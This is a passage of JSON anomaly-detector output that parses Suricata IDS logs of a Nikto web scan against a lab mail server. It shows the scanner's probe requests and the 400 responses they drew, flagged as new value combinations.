"/parser/model/time": 1583349514.249681, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":201554209196080,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA\\/\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA\\/\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA\\/", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA\\/", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46862, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":201554209196080,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 201554209196080, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.249681+0000\",\"flow_id\":201554209196080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.251198 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46864 -> 192.168.10.154:80", "/parser/model/time": 1583349514.251198, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46864, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.251198 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46864 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.SMAIL893", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.251429+0000\",\"flow_id\":1038059219636916,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.251429, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1038059219636916,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.SMAIL893\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.SMAIL893\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.SMAIL893", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.SMAIL893", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", 
"/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46864, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", 
"/parser/model/flow_id/flow_id": "\"flow_id\":1038059219636916,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1038059219636916, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.251429+0000\",\"flow_id\":1038059219636916,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.252850 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46866 -> 192.168.10.154:80", "/parser/model/time": 1583349514.25285, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", 
"/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46866, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.252850 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46866 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cellsprint", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.252999+0000\",\"flow_id\":384781809015003,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.252999, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":384781809015003,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 
"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cellsprint\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cellsprint\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cellsprint", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cellsprint", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": 
"\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46866, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":384781809015003,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 384781809015003, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.252999+0000\",\"flow_id\":384781809015003,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.254583 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] 
[Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46868 -> 192.168.10.154:80", "/parser/model/time": 1583349514.254583, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46868, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.254583 [**] [1:2221030:1] SURICATA 